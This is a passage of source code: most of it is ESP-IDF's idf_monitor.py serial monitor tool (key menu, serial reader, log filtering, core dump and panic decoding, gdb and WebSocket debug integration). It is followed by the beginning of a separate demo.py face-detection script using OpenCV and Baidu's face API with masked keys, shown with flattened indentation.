yellow_print('Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart')
# to fast trigger pause without press menu key
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
time.sleep(0.005) # Add a delay to meet the requirements of minimal EN low time (2ms for ESP32-C3)
self.serial.rts = False
self.serial.dtr = self.serial.dtr # usbser.sys workaround
try:
while self.alive:
try:
data = self.serial.read(self.serial.in_waiting or 1)
except (serial.serialutil.SerialException, IOError) as e:
data = b''
# self.serial.open() was successful before, therefore, this is an issue related to
# the disappearance of the device
red_print(e)
yellow_print('Waiting for the device to reconnect', newline='')
self.serial.close()
while self.alive: # so that exiting monitor works while waiting
try:
time.sleep(0.5)
self.serial.open()
break # device connected
except serial.serialutil.SerialException:
yellow_print('.', newline='')
sys.stderr.flush()
yellow_print('') # go to new line
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict['*'] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get('*', self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get('*', self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make='make', encrypted=False,
toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol='CRLF',
decode_coredumps=COREDUMP_DECODE_INFO,
decode_panic=PANIC_DECODE_DISABLE,
target=None,
websocket_client=None,
enable_address_decoding=True):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
self.enable_address_decoding = enable_address_decoding
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith('socket://') # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.encrypted = encrypted
self.toolchain_prefix = toolchain_prefix
self.websocket_client = websocket_client
self.target = target
# internal state
self._last_line_part = b''
self._gdb_buffer = b''
self._pc_address_buffer = b''
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
self._decode_coredumps = decode_coredumps
self._reading_coredump = COREDUMP_IDLE
self._coredump_buffer = b''
self._decode_panic = decode_panic
self._reading_panic = PANIC_IDLE
self._panic_buffer = b''
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no further data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError('Bad event data %r' % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + 'Stopping condition has been received\n')
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + '\n')
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b'':
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b''
if sp[-1] != b'':
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b'':
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
self.check_panic_decode_trigger(line)
self.check_coredump_trigger_before_print(line)
if self._force_line_print or self._line_matcher.match(line.decode(errors='ignore')):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_coredump_trigger_after_print(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b'':
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors='ignore'))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b''
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b''
if self.enable_address_decoding:
for m in re.finditer(MATCH_PCADDR, line.decode(errors='ignore')):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print('--- {}'.format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print('Running %s...' % ' '.join(popen_args))
p = subprocess.Popen(popen_args, env=os.environ)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action('Build failed')
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ['%saddr2line' % self.toolchain_prefix,
'-pfiaC', '-e', self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd='.')
if b'?? ??:0' not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print('%s: %s' % (' '.join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b''
m = re.search(b'\\$(T..)#(..)', line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
if self.websocket_client:
yellow_print('Communicating through WebSocket')
self.websocket_client.send({'event': 'gdb_stub',
'port': self.serial.port,
'prog': self.elf_file})
yellow_print('Waiting for debug finished event')
self.websocket_client.wait([('event', 'debug_finished')])
yellow_print('Communications through WebSocket is finished')
else:
self.run_gdb()
else:
red_print('Malformed gdb message... calculated checksum %02x received %02x' % (chsum, calc_chsum))
def check_coredump_trigger_before_print(self, line):
if self._decode_coredumps == COREDUMP_DECODE_DISABLE:
return
if COREDUMP_UART_PROMPT in line:
yellow_print('Initiating core dump!')
self.event_queue.put((TAG_KEY, '\n'))
return
if COREDUMP_UART_START in line:
yellow_print('Core dump started (further output muted)')
self._reading_coredump = COREDUMP_READING
self._coredump_buffer = b''
self._output_enabled = False
return
if COREDUMP_UART_END in line:
self._reading_coredump = COREDUMP_DONE
yellow_print('\nCore dump finished!')
self.process_coredump()
return
if self._reading_coredump == COREDUMP_READING:
kb = 1024
buffer_len_kb = len(self._coredump_buffer) // kb
self._coredump_buffer += line.replace(b'\r', b'') + b'\n'
new_buffer_len_kb = len(self._coredump_buffer) // kb
if new_buffer_len_kb > buffer_len_kb:
yellow_print('Received %3d kB...' % (new_buffer_len_kb), newline='\r')
def check_coredump_trigger_after_print(self, line):
if self._decode_coredumps == COREDUMP_DECODE_DISABLE:
return
# Re-enable output after the last line of core dump has been consumed
if not self._output_enabled and self._reading_coredump == COREDUMP_DONE:
self._reading_coredump = COREDUMP_IDLE
self._output_enabled = True
self._coredump_buffer = b''
def process_coredump(self):
if self._decode_coredumps != COREDUMP_DECODE_INFO:
raise NotImplementedError('process_coredump: %s not implemented' % self._decode_coredumps)
coredump_script = os.path.join(os.path.dirname(__file__), '..', 'components', 'espcoredump', 'espcoredump.py')
coredump_file = None
try:
# On Windows, the temporary file can't be read unless it is closed.
# Set delete=False and delete the file manually later.
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as coredump_file:
coredump_file.write(self._coredump_buffer)
coredump_file.flush()
if self.websocket_client:
self._output_enabled = True
yellow_print('Communicating through WebSocket')
self.websocket_client.send({'event': 'coredump',
'file': coredump_file.name,
'prog': self.elf_file})
yellow_print('Waiting for debug finished event')
self.websocket_client.wait([('event', 'debug_finished')])
yellow_print('Communications through WebSocket is finished')
else:
cmd = [sys.executable,
coredump_script,
'info_corefile',
'--core', coredump_file.name,
'--core-format', 'b64',
self.elf_file
]
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
self._output_enabled = True
self._print(output)
self._output_enabled = False # Will be reenabled in check_coredump_trigger_after_print
except subprocess.CalledProcessError as e:
yellow_print('Failed to run espcoredump script: {}\n{}\n\n'.format(e, e.output))
self._output_enabled = True
self._print(COREDUMP_UART_START + b'\n')
self._print(self._coredump_buffer)
# end line will be printed in handle_serial_input
finally:
if coredump_file is not None:
try:
os.unlink(coredump_file.name)
except OSError as e:
yellow_print("Couldn't remote temporary core dump file ({})".format(e))
def check_panic_decode_trigger(self, line):
if self._decode_panic == PANIC_DECODE_DISABLE:
return
if self._reading_panic == PANIC_IDLE and re.search(PANIC_START, line.decode('ascii', errors='ignore')):
self._reading_panic = PANIC_READING
yellow_print('Stack dump detected')
if self._reading_panic == PANIC_READING and PANIC_STACK_DUMP in line:
self._output_enabled = False
if self._reading_panic == PANIC_READING:
self._panic_buffer += line.replace(b'\r', b'') + b'\n'
if self._reading_panic == PANIC_READING and PANIC_END in line:
self._reading_panic = PANIC_IDLE
self._output_enabled = True
self.process_panic_output(self._panic_buffer)
self._panic_buffer = b''
def process_panic_output(self, panic_output):
panic_output_decode_script = os.path.join(os.path.dirname(__file__), '..', 'tools', 'gdb_panic_server.py')
panic_output_file = None
try:
# On Windows, the temporary file can't be read unless it is closed.
# Set delete=False and delete the file manually later.
with tempfile.NamedTemporaryFile(mode='wb', delete=False) as panic_output_file:
panic_output_file.write(panic_output)
panic_output_file.flush()
cmd = [self.toolchain_prefix + 'gdb',
'--batch', '-n',
self.elf_file,
'-ex', "target remote | \"{python}\" \"{script}\" --target {target} \"{output_file}\""
.format(python=sys.executable,
script=panic_output_decode_script,
target=self.target,
output_file=panic_output_file.name),
'-ex', 'bt']
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
yellow_print('\nBacktrace:\n\n')
self._print(output)
except subprocess.CalledProcessError as e:
yellow_print('Failed to run gdb_panic_server.py script: {}\n{}\n\n'.format(e, e.output))
self._print(panic_output)
finally:
if panic_output_file is not None:
try:
os.unlink(panic_output_file.name)
except OSError as e:
yellow_print("Couldn't remove temporary panic output file ({})".format(e))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ['%sgdb' % self.toolchain_prefix,
'-ex', 'set serial baud %d' % self.serial.baudrate,
'-ex', 'target remote %s' % self.serial.port,
'-ex', 'interrupt', # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd='.')
process.wait()
except OSError as e:
red_print('%s: %s' % (' '.join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(['stty', 'sane'])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action('gdb exited')
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print('\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.'.format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = 'log.{}.{}.txt'.format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, 'wb+')
yellow_print('\nLogging is enabled into file {}'.format(name))
except Exception as e:
red_print('\nLog file {} cannot be created: {}'.format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print('\nLogging is disabled and file {} has been closed'.format(name))
except Exception as e:
red_print('\nLog file cannot be closed: {}'.format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print('\nCannot write to file: {}'.format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.2)
self.serial.setRTS(False)
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make('encrypted-flash' if self.encrypted else 'flash')
elif cmd == CMD_APP_FLASH:
self.run_make('encrypted-app-flash' if self.encrypted else 'app-flash')
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
self.serial.setDTR(self.serial.dtr) # usbser.sys workaround
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError('Bad command data %d' % (cmd))
def main():
parser = argparse.ArgumentParser('idf_monitor - a serial output monitor for esp-idf')
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--disable-address-decoding', '-d',
help="Don't print lines about decoded addresses from the application ELF file.",
action='store_true',
default=True if os.environ.get('ESP_MONITOR_DECODE') == 0 else False
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--encrypted',
help='Use encrypted targets while running make',
action='store_true')
parser.add_argument(
'--toolchain-prefix',
help='Triplet prefix to add before cross-toolchain names',
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
'--eol',
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help='End of line to use when sending to the serial port',
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help='Filtering string',
default=DEFAULT_PRINT_FILTER)
parser.add_argument(
'--decode-coredumps',
choices=[COREDUMP_DECODE_INFO, COREDUMP_DECODE_DISABLE],
default=COREDUMP_DECODE_INFO,
help='Handling of core dumps found in serial output'
)
parser.add_argument(
'--decode-panic',
choices=[PANIC_DECODE_BACKTRACE, PANIC_DECODE_DISABLE],
default=PANIC_DECODE_DISABLE,
help='Handling of panic handler info found in serial output'
)
parser.add_argument(
'--target',
required=False,
help='Target name (used when stack dump decoding is enabled)'
)
parser.add_argument(
'--ws',
default=os.environ.get('ESP_IDF_MONITOR_WS', None),
help='WebSocket URL for communicating with IDE tools for debugging purposes'
)
args = parser.parse_args()
# GDB uses CreateFile to open COM port, which requires the COM name to be r'\\.\COMx' if the COM
# number is larger than 10
if os.name == 'nt' and args.port.startswith('COM'):
args.port = args.port.replace('COM', r'\\.\COM')
yellow_print('--- WARNING: GDB cannot open serial ports accessed as COMx')
yellow_print('--- Using %s instead...' % args.port)
elif args.port.startswith('/dev/tty.') and sys.platform == 'darwin':
args.port = args.port.replace('/dev/tty.', '/dev/cu.')
yellow_print('--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.')
yellow_print('--- Using %s instead...' % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ['MAKEFLAGS']
makeflags = re.sub(r'--jobserver[^ =]*=[0-9,]+ ?', '', makeflags)
os.environ['MAKEFLAGS'] = makeflags
except KeyError:
pass # not running a make jobserver
# Pass the actual used port to callee of idf_monitor (e.g. make) through `ESPPORT` environment
# variable
# To make sure the key as well as the value are str type, by the requirements of subprocess
espport_key = str('ESPPORT')
espport_val = str(args.port)
os.environ.update({espport_key: espport_val})
ws = WebSocketClient(args.ws) if args.ws else None
try:
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.encrypted,
args.toolchain_prefix, args.eol,
args.decode_coredumps, args.decode_panic, args.target,
ws, enable_address_decoding=not args.disable_address_decoding)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
finally:
if ws:
ws.close()
class WebSocketClient(object):
"""
WebSocket client used to advertise debug events to WebSocket server by sending and receiving JSON-serialized
dictionaries.
Advertisement of debug event:
{'event': 'gdb_stub', 'port': '/dev/ttyUSB1', 'prog': 'build/elf_file'} for GDB Stub, or
{'event': 'coredump', 'file': '/tmp/xy', 'prog': 'build/elf_file'} for coredump,
where 'port' is the port for the connected device, 'prog' is the full path to the ELF file and 'file' is the
generated coredump file.
Expected end of external debugging:
{'event': 'debug_finished'}
"""
RETRIES = 3
CONNECTION_RETRY_DELAY = 1
def __init__(self, url):
self.url = url
self._connect()
def _connect(self):
"""
Connect to WebSocket server at url
"""
self.close()
for _ in range(self.RETRIES):
try:
self.ws = websocket.create_connection(self.url)
break # success
except NameError:
raise RuntimeError('Please install the websocket_client package for IDE integration!')
except Exception as e:
red_print('WebSocket connection error: {}'.format(e))
time.sleep(self.CONNECTION_RETRY_DELAY)
else:
raise RuntimeError('Cannot connect to WebSocket server')
def close(self):
try:
self.ws.close()
except AttributeError:
# Not yet connected
pass
except Exception as e:
red_print('WebSocket close error: {}'.format(e))
def send(self, payload_dict):
"""
Serialize payload_dict in JSON format and send it to the server
"""
for _ in range(self.RETRIES):
try:
self.ws.send(json.dumps(payload_dict))
yellow_print('WebSocket sent: {}'.format(payload_dict))
break
except Exception as e:
red_print('WebSocket send error: {}'.format(e))
self._connect()
else:
raise RuntimeError('Cannot send to WebSocket server')
def wait(self, expect_iterable):
"""
Wait until a dictionary in JSON format is received from the server with all (key, value) tuples from
expect_iterable.
"""
for _ in range(self.RETRIES):
try:
r = self.ws.recv()
except Exception as e:
red_print('WebSocket receive error: {}'.format(e))
self._connect()
continue
obj = json.loads(r)
if all([k in obj and obj[k] == v for k, v in expect_iterable]):
yellow_print('WebSocket received: {}'.format(obj))
break
red_print('WebSocket expected: {}, received: {}'.format(dict(expect_iterable), obj))
else:
raise RuntimeError('Cannot receive from WebSocket server')
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except (IOError, OSError):
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1163
#
# Also possible for Windows to throw an OSError error if the data is invalid for the console
# (garbage bytes, etc)
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
try:
self.output.flush()
except OSError:
# Account for Windows Console refusing to accept garbage bytes (serial noise, etc)
pass
if __name__ == '__main__':
main()
|
demo.py
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import base64
import cv2
from multiprocessing import Process,Queue
from aip import AipFace
APP_ID = '******'
API_KEY = '******'
SECRET_KEY = '******'
groupIdList = '******'
imageType = "BASE64"
client = AipFace(APP_ID, API_KEY, SECRET_KEY)
video = cv2.VideoCapture(0)
video.set(cv2.CAP_PROP_FRAME_WIDTH,1920)
video.set(cv2.CAP_PROP_FRAME_HEIGHT,1080)
x_const = int(video.get(cv2.CAP_PROP_FRAME_WIDTH) / 2)
y_const = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT) / 2)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
scalar = 5
def video_show(i = 1):
# cv2.namedWindow("face", cv2.WINDOW_NORMAL)
# cv2.setWindowProperty("face", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
while True:
time = cv2.getTickCount()
_,cap = video.read()
img = cv2.resize(cap,(int(x_const*2/scalar),int(y_const*2/scalar)))
img_gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(img_gray,scaleFactor=1.1,minNeighbors=5)
i = i + 1
if i == 20:
i = 0
if Tx.empty() and len(faces):
Tx.put(cv2.imencode(".jpg",img)[1].tostring())
for (x,y,w,h) in faces:
x *= scalar
y *= scalar
w *= scalar
h *= scalar
cv2.rectangle(cap,(x,y),(x+w,y+h),(255,0,0),2)
try:
Rx.get_nowait()
